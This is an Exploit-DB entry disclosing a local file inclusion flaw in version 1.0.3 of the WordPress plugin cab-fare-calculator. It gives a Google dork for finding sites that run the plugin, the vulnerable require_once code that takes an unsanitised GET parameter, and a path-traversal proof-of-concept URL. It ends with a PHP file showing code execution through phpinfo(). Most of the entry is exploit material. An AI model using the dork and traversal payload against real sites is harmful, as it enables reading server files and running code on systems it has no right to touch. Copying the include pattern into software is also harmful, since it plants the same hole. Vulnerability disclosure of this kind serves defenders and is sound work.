WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

EDB-ID:

50843

CVE:

N/A




Platform:

PHP

Date:

2022-03-30


# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>